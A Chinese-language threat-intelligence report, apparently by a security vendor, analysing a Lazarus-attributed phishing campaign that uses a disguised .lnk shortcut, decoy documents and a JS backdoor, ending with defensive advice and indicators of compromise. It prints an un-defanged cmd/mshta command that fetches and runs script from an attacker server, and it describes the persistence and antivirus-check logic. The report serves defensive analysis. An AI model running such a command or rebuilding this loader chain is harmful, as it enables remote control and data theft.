概述
近日,瑞星威胁情报中心捕获到一起针对中国政府或企业发起的APT攻击事件,通过分析发现,攻击者利用钓鱼邮件等方式投递名为安全状态检查.zip的压缩包文件,其主题为:信息安全技术 信息系统安全等级保护实施指南,以此来诱使与中国信息安全相关的政府部门或企业上钩,一旦中招,电脑将被攻击者远程控制,执行任意代码并盗取重要数据信息。
瑞星安全专家通过对攻击手法分析发现,此次攻击和Lazarus Group组织相关,该组织又被称为Group 77、Hastati Group、Hidden Cobra、APT-C-26、T-APT-15、Zinc和Nickel Academy等,是一个从2007年开始到现在最活跃的威胁组织之一。Lazarus Group来自朝鲜,具有国家背景,其除了擅长信息盗取,间谍活动,还会蓄意破坏计算机系统,加密数据以获取经济利益,攻击的国家包括中国,德国,澳大利亚,日本等,涉及的领域有航空航天、政府、医疗、金融和媒体等。
同样在5月份,瑞星还捕获到Lazarus Group组织以相同攻击手法模仿加拿大玛斯MaRS网站中文章的诱饵文档,内容主要是关于创建员工奖金和激励计划。由于MaRS与中国一直有着紧密的合作,因此该攻击或与中国企业相关。
事件详情
诱饵文档内容为中文,主题为:信息安全技术 信息系统安全等级保护实施指南,因此猜测此次攻击事件的目标可能是与中国信息安全相关的政府部门或企业。
攻击流程
相关负载分析
攻击者利用钓鱼邮件等方式投递名为安全状态检查.zip的压缩包文件,用户解压压缩包得到名为安全状态检查指南_signed.pdf.lnk的快捷方式文件,快捷方式目标指向一段JS代码,利用这段JS代码去打开诱饵文档迷惑用户,并释放恶意程序以便达到对用户计算机进行远程控制的目的。
安全状态检查.zip分析
安全状态检查.zip压缩包内含名为安全状态检查指南_signed.pdf.lnk的快捷方式。
安全状态检查指南_signed.pdf.lnk分析
安全状态检查指南_signed.pdf.lnk快捷方式的主要目的是利用cmd.exe调用mshta.exe执行链接指向的脚本代码。
C:\Windows\System32\cmd.exe /c start /b %SystemRoot%\System32\mshta https://dev.sslsharecloud.net/eX4ViMdTijWD2ctCpbUCeGhUGl0UsqbFGVPD3kW9Eb8=脚本代码分析
解密得到诱饵文档链接并打开。诱饵文档链接地址为:hxxps[:]//drive[.]google[.]com/file/d/1oMCypC3mUflHaEkhhG0Aho7iZ5HJMqHf/view?usp=sharing。
在%temp%目录下释放名为kntcfini.js的脚本文件。kntcfini.js文件的主要作用是和hxxp://dev[.]sslsharecloud[.]net/进行通信:下发和上传数据。
创建MSEdge.lnk快捷方式文件:遍历系统进程找寻BitDefender杀毒软件、Symantec(赛门铁克)安全软件相关的进程。如果没有找到,便在%temp%目录下释放名为MSEdge.lnk的快捷方式文件。
设置MSEdge.lnk快捷方式开机自启:遍历进程找寻BitDefender杀毒软件、Symantec(赛门铁克)安全软件和金山毒霸软件相关的进程,如果没有找到,则将快捷方式移动到Windows的startup自启动目录下。
执行kntcfini.js脚本:遍历系统进程如果存在金山毒霸和Net Protector反病毒软件相关的进程,则利用wcscript执行kntcfini.js脚本,不存在则利用wscript执行kntcfini.js脚本。
MSEdge.lnk分析
MSEdge.lnk快捷方式文件的主要作用是利用mshta.exe执行来自短链接hxxps[:]//bit[.]ly/2SqhryO(实际链接:hxxps[:]//dev[.]sslsharecloud[.]net/fxtOrcvb+fQUL4CTNzNeHCMiNFkc3enYTvhH9hPmO8k=)的JS脚本代码。以下关于所执行的JS代码的详细分析。
在%temp%目录下释放名为jdfed.js的脚本文件。执行jdfed.js脚本:遍历系统进程,如果存在金山毒霸和Net Protector反病毒软件相关的进程,则利用wcscript执行jdfed.js脚本,不存在则利用wscript执行jdfed.js脚本。jdfed.js脚本的主要作用是和hxxp[:]//dev[.]sslsharecloud[.]net/进行通信。jdfed.js文件和上述的kntcfini.js文件内容完全一样。
kntcfini.js/jdfed.js文件分析
该脚本主要操作是持续等待攻击方下发JS代码并执行,同时每隔15秒便向hxxp[:]//dev[.]sslsharecloud[.]net/发送数据。发送的数据组成方式为:a.[随机8个数字字符][2 / 1]1,例如a9254905121,a1860429611。
关联事件分析
除了这起疑似针对中国的攻击事件,之前还有捕获到疑似Lazarus组织的其他攻击事件。通过分析对比发现这几起攻击事件所用的攻击手法高度相似。这起攻击事件投递的诱饵文档内容主要是关于创建员工奖金和激励计划。通过溯源得知该文章从加拿大MaRS网站上摘抄得来。(原文链接:
https://learn.marsdd.com/article/creating-employee-bonus-and-incentive-programs-an-overview/)。
总结
这两个攻击事件中,攻击者所使用的攻击手法高度一致,除了通信C2不一致,用于和C2通信的JS代码是一样的,如果攻击者对目标攻击成功,那么攻击者便可以在目标的电脑上执行任意代码,远程控制并实施各种攻击。
由于APT攻击有着针对性强、组织严密、持续时间长、高隐蔽性和间接攻击的显著特征,针对的目标都是具有重大信息资产,如国家军事、情报、战略部门和影响国计民生的行业如金融、能源等,因此国内相关政府机构和企业单位务必要引起重视,加强防御措施。
预防措施
-
不打开可疑文件。
不打开未知来源的可疑的文件和邮件,防止社会工程学和钓鱼攻击。
-
部署网络安全态势感知、预警系统等网关安全产品。
网关安全产品可利用威胁情报追溯威胁行为轨迹,帮助用户进行威胁行为分析、定位威胁源和目的,追溯攻击的手段和路径,从源头解决网络威胁,最大范围内发现被攻击的节点,帮助企业更快响应和处理。
-
安装有效的杀毒软件,拦截查杀恶意文档和木马病毒。
杀毒软件可拦截恶意文档和木马病毒,如果用户不小心下载了恶意文件,杀毒软件可拦截查杀,阻止病毒运行,保护用户的终端安全。
-
及时修补系统补丁和重要软件的补丁。
沦陷信标(IOC)
-
MD5
60214745027C7EFA7CC920D43D9C254A 2690A623A402A07ED0544A8E965FDEA4 539398C1554EBC30F458925D425D16DD 9ACE2157C158F4CE3CAF1E91B3282EF4 23168FD4DFEDE643AAFAA419F96E740B 315E164CA1E953655A0AABA99AA92250 8FFABD11252239362E7FEC136BB1CA37 13108795C5DAD870F3665ECC5B5A111A 85E2DED7524F51DCDBFADDEE171AF978 8371EAF2B3A31CC5EA3135D77AF6D0DE 84B0F41D0EF93833D70BFCCB888DE274 F3F94693423AFF0DA8E56899233F0102 9A06CE2B0B038DE9147F93BBB3B3C56C AEAC6F569FB9A7D3F32517AA16E430D6 -
URL
hxxps[:]//dev[.]sslsharecloud[.]net/eX4ViMdTijWD2ctCpbUCeGhUGl0UsqbFGVPD3kW9Eb8= hxxps[:]//drive[.]google[.]com/file/d/1oMCypC3mUflHaEkhhG0Aho7iZ5HJMqHf/view?usp=sharing hxxp[:]//dev[.]sslsharecloud[.]net/ hxxps[:]//bit[.]ly/2SqhryO hxxps[:]//dev[.]sslsharecloud[.]net/fxtOrcvb+fQUL4CTNzNeHCMiNFkc3enYTvhH9hPmO8k= hxxps[:]//www[.]googledocpage[.]com/yBaBQON1pkq6O6JthQoMIaLwphTVer6ytCpfzSgECdM= hxxps[:]//drive[.]google[.]com/file/d/1trBRwq10DsOK1bxUdYkcgqs7wpZYrJlR/view hxxps[:]//bit[.]ly/R1dDn1 hxxp[:]//www[.]googledocpage[.]com/MaV5l/Mh187to6n8yhVOc9pDy691NwNWXHoSdbcxnuk= -
IPV4
45[.]61[.]136[.]204